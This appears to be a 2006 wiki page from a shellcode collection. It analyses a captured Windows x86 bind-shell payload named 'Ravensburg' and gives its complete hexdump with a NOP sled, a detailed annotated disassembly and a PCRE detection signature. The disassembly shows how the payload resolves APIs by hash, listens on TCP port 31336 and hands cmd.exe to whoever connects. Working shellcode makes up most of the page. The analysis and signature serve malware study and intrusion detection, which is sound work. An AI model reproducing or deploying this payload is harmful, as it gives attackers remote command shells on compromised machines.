
Ravensburg Shellcode

Shellcode

raw

hexdump

00000000  00 00 23 f8 29 00 ff 23  05 39 1e c8 68 22 39 05  |..#ø).ÿ#.9.Èh"9.|
00000010  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000030  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000060  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000070  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000080  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000090  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000000c0  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
000000d0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000000e0  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
000000f0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000120  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000140  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
00000150  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000170  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
00000180  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000001a0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000001d0  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
000001e0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
000001f0  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000200  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000230  7c f4 3d 05 68 22 39 05  68 22 39 05 68 22 39 05  ||ô=.h"9.h"9.h"9.|
00000240  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000250  68 22 39 05 68 22 39 05  7c f4 3d 05 7c f4 3d 05  |h"9.h"9.|ô=.|ô=.|
00000260  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000290  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
000002b0  68 22 39 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  |h"9.|ô=.|ô=.|ô=.|
000002c0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000002e0  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 68 22 39 05  ||ô=.|ô=.|ô=.h"9.|
000002f0  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
*
00000310  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
00000340  7c f4 3d 05 7c f4 3d 05  68 22 39 05 68 22 39 05  ||ô=.|ô=.h"9.h"9.|
00000350  68 22 39 05 68 22 39 05  68 22 39 05 68 22 39 05  |h"9.h"9.h"9.h"9.|
00000360  68 22 39 05 68 22 39 05  68 22 39 05 7c f4 3d 05  |h"9.h"9.h"9.|ô=.|
00000370  7c f4 3d 05 7c f4 3d 05  7c f4 3d 05 7c f4 3d 05  ||ô=.|ô=.|ô=.|ô=.|
*
000003a0  7c f4 3d 05 90 90 90 90  90 90 90 90 90 90 90 90  ||ô=.............|
000003b0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
00000450  90 90 90 90 90 90 90 90  eb 23 7a 68 02 05 6c 59  |........ë#zh..lY|
00000460  f8 1d 9c de 8c d1 4c 70  d4 03 f0 27 20 20 30 08  |ø..Þ.ÑLpÔ.ð'  0.|
00000470  57 53 32 5f 33 32 2e 44  4c 4c 01 eb 05 e8 f9 ff  |WS2_32.DLL.ë.èùÿ|
00000480  ff ff 5d 83 ed 2a 6a 30  59 64 8b 01 8b 40 0c 8b  |ÿÿ].í*j0Yd...@..|
00000490  70 1c ad 8b 78 08 8d 5f  3c 8b 1b 01 fb 8b 5b 78  |p.­.x.._<...û.[x|
000004a0  01 fb 8b 4b 1c 01 f9 8b  53 24 01 fa 53 51 52 8b  |.û.K..ù.S$.úSQR.|
000004b0  5b 20 01 fb 31 c9 41 31  c0 99 8b 34 8b 01 fe ac  |[ .û1ÉA1À..4..þ¬|
000004c0  31 c2 d1 e2 84 c0 75 f7  0f b6 45 05 8d 44 45 04  |1ÂÑâ.Àu÷.¶E..DE.|
000004d0  66 39 10 75 e1 66 31 10  5a 58 5e 56 50 52 2b 4e  |f9.uáf1.ZX^VPR+N|
000004e0  10 41 0f b7 0c 4a 8b 04  88 01 f8 0f b6 4d 05 89  |.A.·.J....ø.¶M..|
000004f0  44 8d d8 fe 4d 05 75 be  fe 4d 04 74 21 fe 4d 22  |D.ØþM.uŸþM.t!þM"|
00000500  8d 5d 18 53 ff d0 89 c7  6a 04 58 88 45 05 80 45  |.].SÿÃ.Çj.X.E..E|
00000510  77 0a 8d 5d 74 80 6b 26  14 e9 78 ff ff ff 89 ce  |w..]t.k&.éxÿÿÿ.Î|
00000520  31 db 53 53 53 53 56 46  56 ff d0 97 55 58 66 89  |1ÛSSSSVFVÿÃ.UXf.|
00000530  30 6a 10 55 57 ff 55 d4  4e 56 57 ff 55 cc 53 55  |0j.UWÿUÔNVWÿUÌSU|
00000540  57 ff 55 d0 97 8d 45 88  50 ff 55 e4 55 55 ff 55  |WÿUÃ..E.PÿUäUUÿU|
00000550  e8 8d 44 05 0c 94 53 68  2e 65 78 65 68 5c 63 6d  |è.D...Sh.exeh\cm|
00000560  64 94 31 d2 8d 45 cc 94  57 57 57 53 53 fe c6 01  |d.1Ò.EÌ.WWWSSþÆ.|
00000570  f2 52 94 8d 45 78 50 8d  45 88 50 b1 08 53 53 6a  |òR..ExP.E.P±.SSj|
00000580  10 fe ce 52 53 53 53 55  ff 55 ec 6a ff ff 55 e0  |.þÎRSSSUÿUìjÿÿUà |
00000590  00 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
000005a0  90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 90  |................|
*
000023f0  90 90 90 90 90 90 90 90  90 90 90 90              |............|
000023fc

Analysis

shellcode

0000041C ; Import slot table (ebp = 0x458). Filled by 'mov [ebp+ecx*4-28h], eax' at 0x4EF:
0000041C ; the kernel32 pass writes ebp-24h..ebp-14h, then the displacement is self-patched
0000041C ; to -3Ch (0x515) and the WS2_32 pass writes ebp-38h..ebp-2Ch. The STARTUPINFOA at
0000041C ; ebp-78h extends to ebp-35h, so GetStartupInfoA (0x549) and the pushes at
0000041C ; 0x568/0x569 later overwrite the two lowest slots; by then they are no longer needed.
0000041C                 dd 90909090h            ; ebp-3C  never written by the resolver; becomes STARTUPINFOA.hStdOutput
00000420 ptrWSASocketA   dd 90909090h            ; ebp-38  written, but WSASocketA is called through eax (0x529); becomes STARTUPINFOA.hStdError
00000424 ptrlisten       dd 90909090h            ; ebp-34  read at 0x53B
00000428 ptraccept       dd 90909090h            ; ebp-30  read at 0x541
0000042C ptrbind         dd 90909090h            ; ebp-2C  read at 0x535
00000430                 dd 90909090h            ; ebp-28  never written or read
00000434 ptrGetModuleHandleA dd 90909090h        ; ebp-24  written, but GetModuleHandleA is called through eax (0x504)
00000438 ptrSleep        dd 90909090h            ; ebp-20  read at 0x58D
0000043C ptrGetStartupInfoA dd 90909090h         ; ebp-1C  read at 0x549
00000440 ptrGetSystemDirectoryA dd 90909090h     ; ebp-18  read at 0x54E
00000444 ptrCreateProcessA dd 90909090h          ; ebp-14  read at 0x588
00000448                 dd 90909090h            ; ebp-10  ebp-10..ebp-01: not referenced anywhere in this listing
0000044C                 dd 90909090h            ; ebp-0C
00000450                 dd 90909090h            ; ebp-08
00000454                 dd 90909090h            ; ebp-04
00000458 ; ---------------------------------------------------------------------------
00000458 ; Config block, ebp = 0x458 (call/pop at 0x47D/0x482, minus 2Ah). Its first 16 bytes
00000458 ; double as the sockaddr_in handed to bind/accept: the jmp below gets sin_family
00000458 ; written over it at 0x52E, 0x45A is sin_port, and ebp+4..ebp+0F read as zero by
00000458 ; then (both counters decremented to 0, every kernel32 hash XORed away at 0x4D5),
00000458 ; so sin_addr = INADDR_ANY and sin_zero is clean.
00000458                 jmp     short loc_47D   ; entry point: skip the data below
00000458 ; ---------------------------------------------------------------------------
0000045A                 dw 687Ah                ; port: bytes 7A 68 in memory, i.e. sin_port in network order = TCP 31336 in this sample (per-instance value, wildcarded as (..) in the pcre further down)
0000045C                 db 2                    ; ebp+4: modules to import from (kernel32, then WS2_32); decremented at 0x4F8
0000045D                 db 5                    ; ebp+5: imports left for the current module, doubles as 1-based index into the hash list; reset to 4 for WS2_32 at 0x50B
0000045E ; Export-name hashes: h = 0; for each byte b of the name incl. its NUL: h = (h ^ b) << 1;
0000045E ; only the low 16 bits are compared (loop at 0x4BF). Each group is walked from its
0000045E ; last entry to its first; a matched hash is zeroed. These constants plus the
0000045E ; 'WS2_32.DLL' string are the stable part of the byte signature further down.
0000045E                 dw 596Ch                ; Hash of GetModuleHandleA (idx 1, resolved last; then called at 0x504)
00000460                 dw 1DF8h                ; Hash of Sleep (idx 2)
00000462                 dw 0DE9Ch               ; Hash of GetStartupInfoA (idx 3)
00000464                 dw 0D18Ch               ; Hash of GetSystemDirectoryA (idx 4)
00000466                 dw 704Ch                ; Hash of CreateProcessA (idx 5, resolved first)
00000468                 dw 3D4h                 ; Hash of WSASocketA (WS2_32 idx 1, resolved last; then called at 0x529)
0000046A                 dw 27F0h                ; Hash of listen (idx 2)
0000046C                 dw 2020h                ; Hash of accept (idx 3)
0000046E                 dw 830h                 ; Hash of bind (idx 4, resolved first)
00000470 aWs2_32_dll     db 'WS2_32.DLL'         ; ebp+18h; passed to GetModuleHandleA at 0x504, so the DLL must already be loaded in the host process
0000047A                 db    1                 ; ebp+22h: placeholder terminator, decremented to 0 at 0x4FD right before use (presumably to keep the payload NUL-free)
0000047B ; ---------------------------------------------------------------------------
0000047B
0000047B loc_47B:
0000047B                 jmp     short loc_482   ; second hop of the call/pop GetPC trick
0000047D ; ---------------------------------------------------------------------------
0000047D
0000047D loc_47D:
0000047D                 call    loc_47B         ; backward call pushes 0x482; E8 F9 FF FF FF carries no 00 byte
00000482
00000482 loc_482:
00000482                 pop     ebp             ; ebp = 0x482
00000483                 sub     ebp, 2Ah ; '*'  ; ebp = 0x458: base of the config block, the pointer slots below it and the sockaddr_in
00000486                 push    30h ; '0'
00000488                 pop     ecx
00000489                 mov     eax, fs:[ecx]   ; find kernel32 base address: fs:[30h] = PEB
0000048C                 mov     eax, [eax+0Ch]  ; PEB.Ldr
0000048F                 mov     esi, [eax+1Ch]  ; Ldr.InInitializationOrderModuleList.Flink (first entry)
00000492                 lodsd                   ; eax = that entry's Flink = second entry
00000493                 mov     edi, [eax+8]    ; entry.DllBase; assumes the 2nd module in init order is kernel32 (ntdll first) - holds for the Windows releases of this era, not guaranteed later (confirm per target)
00000496
00000496 loc_496:                                ; goto exporttable of module with handle edi (entered once per module: kernel32, then WS2_32 via 0x519)
00000496                 lea     ebx, [edi+3Ch]
00000499                 mov     ebx, [ebx]      ; e_lfanew
0000049B                 add     ebx, edi        ; ebx = PE header
0000049D                 mov     ebx, [ebx+78h]  ; ebx = Export Table RVA (DataDirectory[0].VirtualAddress)
000004A0                 add     ebx, edi        ; ebx = IMAGE_EXPORT_DIRECTORY
000004A2                 mov     ecx, [ebx+1Ch]  ; ecx = Export Address Table RVA (AddressOfFunctions)
000004A5                 add     ecx, edi
000004A7                 mov     edx, [ebx+24h]  ; edx = Ordinal Table RVA (AddressOfNameOrdinals)
000004AA                 add     edx, edi
000004AC                 push    ebx             ; keep export dir / EAT / ordinal table on the stack;
000004AD                 push    ecx             ; re-read and re-pushed at 0x4D8..0x4DD after every hit
000004AE                 push    edx
000004AF                 mov     ebx, [ebx+20h]  ; ebx = Name Pointer Table RVA (AddressOfNames)
000004B2                 add     ebx, edi
000004B4                 xor     ecx, ecx        ; name index; incremented before first use, so name[0] is never examined
000004B6
000004B6 loc_4B6:                                ; per-export loop; no NumberOfNames bound: a hash that never matches walks past the table
000004B6                 inc     ecx
000004B7                 xor     eax, eax
000004B9                 cdq                     ; edx = 0 (hash accumulator)
000004BA                 mov     esi, [ebx+ecx*4] ; esi = Name RVA
000004BD                 add     esi, edi
000004BF
000004BF loc_4BF:                                ; hash: edx = (edx ^ byte) << 1 over the name incl. its NUL; only dx is compared
000004BF                 lodsb
000004C0                 xor     edx, eax
000004C2                 shl     edx, 1
000004C4                 test    al, al
000004C6                 jnz     short loc_4BF
000004C8                 movzx   eax, byte ptr [ebp+5] ; get index of 16-Bit hash needed (counts down 5..1, later 4..1)
000004CC                 lea     eax, [ebp+eax*2+4] ; disp8 (04 at 0x4CF) is patched to 0Eh at 0x50E so the WS2_32 pass reads the hashes at 0x468..0x46F
000004D0                 cmp     [eax], dx       ; first export whose 16-bit hash matches wins; collisions resolve to the earlier export
000004D3                 jnz     short loc_4B6   ; is this one needed ?
000004D5                 xor     [eax], dx       ; remove hash from table (also leaves ebp+4..ebp+0F zeroed for the sockaddr_in used at bind time)
000004D8                 pop     edx             ; ordinal table
000004D9                 pop     eax             ; EAT
000004DA                 pop     esi             ; export dir
000004DB                 push    esi
000004DC                 push    eax
000004DD                 push    edx
000004DE                 sub     ecx, [esi+10h]  ; [esi+10h]=Ordinal Base
000004E1                 inc     ecx             ; ecx = nameIdx - Base + 1: a no-op when Base == 1 (kernel32, ws2_32); AddressOfNameOrdinals is indexed by name index, so any other Base would mis-index
000004E2                 movzx   ecx, word ptr [edx+ecx*2] ; get ordinal of function
000004E6                 mov     eax, [eax+ecx*4] ; get functions RVA
000004E9                 add     eax, edi
000004EB                 movzx   ecx, byte ptr [ebp+5]
000004EF                 mov     [ebp+ecx*4-28h], eax ; slot ebp-28h+4*idx (ebp-24h..ebp-14h); disp8 (D8 at 0x4F2) is patched to -3Ch at 0x515 so the WS2_32 pass fills ebp-38h..ebp-2Ch
000004F3                 dec     byte ptr [ebp+5]
000004F6                 jnz     short loc_4B6   ; Last Import for This Module ?
000004F8                 dec     byte ptr [ebp+4]
000004FB                 jz      short loc_51E   ; Last Module ? (taken after the WS2_32 pass; eax = last resolved = WSASocketA)
000004FD                 dec     byte ptr [ebp+22h] ; remove 1 after WS2_32.DLL to make it a 0-terminated string
00000500                 lea     ebx, [ebp+18h]  ; ebx = Ptr "WS2_32.DLL",0
00000503                 push    ebx
00000504                 call    eax             ; GetModuleHandleA, not LoadLibraryA: eax is the last kernel32 import resolved (idx 1, hash 596Ch at 0x45E). WS2_32.DLL must therefore already be mapped in the host process; a NULL result is not checked
00000506                 mov     edi, eax        ; edi = hModule of WS2_32.DLL
00000508                 push    4
0000050A                 pop     eax
0000050B                 mov     [ebp+5], al     ; set number of imports from WS2_32 needed (hash idx 4..1 = bind, accept, listen, WSASocketA)
0000050E                 add     byte ptr [ebp+77h], 0Ah ; Modify Part of Import Loading Code: ebp+77h = 0x4CF, the disp8 of the lea at 0x4CC (04 -> 0Eh)
00000512                 lea     ebx, [ebp+74h]
00000515                 sub     byte ptr [ebx+26h], 14h ; ebp+9Ah = 0x4F2, the disp8 of the mov at 0x4EF (-28h -> -3Ch); self-patching code, so the payload must sit in writable+executable memory
00000519                 jmp     loc_496         ; goto exporttable of module with handle edi
0000051E ; ---------------------------------------------------------------------------
0000051E
0000051E loc_51E:                                ; esi=1 (ecx = last hash index); eax = WSASocketA; edi = WS2_32 base (dead from here on)
0000051E                 mov     esi, ecx
00000520                 xor     ebx, ebx        ; ebx = 0 for the rest of the payload
00000522                 push    ebx             ; dwFlags = 0
00000523                 push    ebx             ; g = 0
00000524                 push    ebx             ; lpProtocolInfo = NULL
00000525                 push    ebx             ; protocol = 0
00000526                 push    esi             ; type = 1 (SOCK_STREAM)
00000527                 inc     esi
00000528                 push    esi             ; af = 2 (AF_INET)
00000529                 call    eax             ; WSASocketA
0000052B                 xchg    eax, edi        ; edi = listening socket
0000052C                 push    ebp
0000052D                 pop     eax             ; eax = ebp = sockaddr_in
0000052E                 mov     [eax], si       ; sin_family = AF_INET, overwriting the already-executed jmp at 0x458; sin_port = bytes at 0x45A; sin_addr = 0.0.0.0 (ebp+4..ebp+7 are zero by now)
00000531                 push    10h             ; namelen = sizeof(sockaddr_in)
00000533                 push    ebp             ; name
00000534                 push    edi             ; s
00000535                 call    dword ptr [ebp-2Ch] ; bind
00000538                 dec     esi             ; esi = 1
00000539                 push    esi             ; backlog = 1
0000053A                 push    edi
0000053B                 call    dword ptr [ebp-34h] ; listen
0000053E                 push    ebx             ; addrlen = NULL
0000053F                 push    ebp             ; addr (scratch, reuses the sockaddr buffer)
00000540                 push    edi
00000541                 call    dword ptr [ebp-30h] ; accept (blocks until a client connects)
00000544                 xchg    eax, edi        ; edi = accepted client socket; the listening socket handle is left in eax and not used again
00000545                 lea     eax, [ebp-78h]  ; STARTUPINFOA at ebp-78h (0x3E0, inside the NOP sled)
00000548                 push    eax
00000549                 call    dword ptr [ebp-1Ch] ; GetStartupInfoA
0000054C                 push    ebp             ; uSize = ebp (no meaningful bound)
0000054D                 push    ebp             ; lpBuffer = ebp: the system directory overwrites the config/sockaddr block
0000054E                 call    dword ptr [ebp-18h] ; GetSystemDirectoryA; eax = length written (without NUL)
00000551                 lea     eax, [ebp+eax+0Ch] ; end of string + 3 dwords
00000555                 xchg    eax, esp        ; esp now points there; eax keeps the real stack pointer
00000556                 push    ebx             ; NUL terminator
00000557                 push    'exe.'          ; ".exe" in memory
0000055C                 push    'dmc\'          ; "\cmd" in memory: buffer now reads "<sysdir>\cmd.exe"
00000561                 xchg    eax, esp        ; restore esp
00000562                 xor     edx, edx
00000564                 lea     eax, [ebp-34h]  ; end of STARTUPINFOA (ebp-78h + 44h)
00000567                 xchg    eax, esp        ; fill the tail of the struct with pushes, lowest field last
00000568                 push    edi             ; hStdError  = client socket (offset 40h)
00000569                 push    edi             ; hStdOutput = client socket (offset 3Ch)
0000056A                 push    edi             ; hStdInput  = client socket (offset 38h)
0000056B                 push    ebx             ; lpReserved2 = NULL
0000056C                 push    ebx             ; wShowWindow = 0 (SW_HIDE) / cbReserved2 = 0
0000056D                 inc     dh              ; edx = 100h
0000056F                 add     edx, esi        ; edx = 101h = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
00000571                 push    edx             ; dwFlags (offset 2Ch)
00000572                 xchg    eax, esp        ; restore esp
00000573                 lea     eax, [ebp+78h]  ; lpProcessInformation = 0x4D0, i.e. resolver code that has already run
00000576                 push    eax
00000577                 lea     eax, [ebp-78h]
0000057A                 push    eax             ; lpStartupInfo
0000057B                 mov     cl, 8           ; nothing below reads ecx before the call; looks like a leftover (verify)
0000057D                 push    ebx             ; lpCurrentDirectory = NULL
0000057E                 push    ebx             ; lpEnvironment = NULL
0000057F                 push    10h             ; dwCreationFlags = CREATE_NEW_CONSOLE
00000581                 dec     dh              ; edx = 1
00000583                 push    edx             ; bInheritHandles = TRUE, so the socket handles flow into the child
00000584                 push    ebx             ; lpThreadAttributes = NULL
00000585                 push    ebx             ; lpProcessAttributes = NULL
00000586                 push    ebx             ; lpCommandLine = NULL
00000587                 push    ebp             ; lpApplicationName = "<sysdir>\cmd.exe"
00000588                 call    dword ptr [ebp-14h] ; CreateProcessA: cmd.exe with stdin/stdout/stderr bound to the client socket
0000058B                 push    0FFFFFFFFh      ; INFINITE
0000058D                 call    dword ptr [ebp-20h] ; Sleep: the hijacked thread never returns or exits

shellcode patterns

bindshell

/* Byte signature for this sample: the decoder/resolver from the 'jmp short' at 0x458
 * through the Sleep call at 0x58D. The single wildcard (..) after \xEB\x23 stands for the
 * two sin_port bytes at 0x45A, which vary per instance; the 16-bit export hashes, the
 * 'WS2_32.DLL' string and the self-patching resolver are matched literally. The NOP sled
 * in front of the code is not part of the pattern. */
char *pcre = 
"\\xEB\\x23(..)\\x02\\x05\\x6C\\x59\\xF8\\x1D\\x9C\\xDE\\x8C\\xD1\\x4C\\x70"
"\\xD4\\x03\\xF0\\x27\\x20\\x20\\x30\\x08\\x57\\x53\\x32\\x5F\\x33\\x32\\x2E"
"\\x44\\x4C\\x4C\\x01\\xEB\\x05\\xE8\\xF9\\xFF\\xFF\\xFF\\x5D\\x83\\xED\\x2A"
"\\x6A\\x30\\x59\\x64\\x8B\\x01\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x78"
"\\x08\\x8D\\x5F\\x3C\\x8B\\x1B\\x01\\xFB\\x8B\\x5B\\x78\\x01\\xFB\\x8B\\x4B"
"\\x1C\\x01\\xF9\\x8B\\x53\\x24\\x01\\xFA\\x53\\x51\\x52\\x8B\\x5B\\x20\\x01"
"\\xFB\\x31\\xC9\\x41\\x31\\xC0\\x99\\x8B\\x34\\x8B\\x01\\xFE\\xAC\\x31\\xC2"
"\\xD1\\xE2\\x84\\xC0\\x75\\xF7\\x0F\\xB6\\x45\\x05\\x8D\\x44\\x45\\x04\\x66"
"\\x39\\x10\\x75\\xE1\\x66\\x31\\x10\\x5A\\x58\\x5E\\x56\\x50\\x52\\x2B\\x4E"
"\\x10\\x41\\x0F\\xB7\\x0C\\x4A\\x8B\\x04\\x88\\x01\\xF8\\x0F\\xB6\\x4D\\x05"
"\\x89\\x44\\x8D\\xD8\\xFE\\x4D\\x05\\x75\\xBE\\xFE\\x4D\\x04\\x74\\x21\\xFE"
"\\x4D\\x22\\x8D\\x5D\\x18\\x53\\xFF\\xD0\\x89\\xC7\\x6A\\x04\\x58\\x88\\x45"
"\\x05\\x80\\x45\\x77\\x0A\\x8D\\x5D\\x74\\x80\\x6B\\x26\\x14\\xE9\\x78\\xFF"
"\\xFF\\xFF\\x89\\xCE\\x31\\xDB\\x53\\x53\\x53\\x53\\x56\\x46\\x56\\xFF\\xD0"
"\\x97\\x55\\x58\\x66\\x89\\x30\\x6A\\x10\\x55\\x57\\xFF\\x55\\xD4\\x4E\\x56"
"\\x57\\xFF\\x55\\xCC\\x53\\x55\\x57\\xFF\\x55\\xD0\\x97\\x8D\\x45\\x88\\x50"
"\\xFF\\x55\\xE4\\x55\\x55\\xFF\\x55\\xE8\\x8D\\x44\\x05\\x0C\\x94\\x53\\x68"
"\\x2E\\x65\\x78\\x65\\x68\\x5C\\x63\\x6D\\x64\\x94\\x31\\xD2\\x8D\\x45\\xCC"
"\\x94\\x57\\x57\\x57\\x53\\x53\\xFE\\xC6\\x01\\xF2\\x52\\x94\\x8D\\x45\\x78"
"\\x50\\x8D\\x45\\x88\\x50\\xB1\\x08\\x53\\x53\\x6A\\x10\\xFE\\xCE\\x52\\x53"
"\\x53\\x53\\x55\\xFF\\x55\\xEC\\x6A\\xFF\\xFF\\x55\\xE0";
 
 
csni/shellcodes/ravensburg.txt · Last modified: 2006/02/17 14:01
 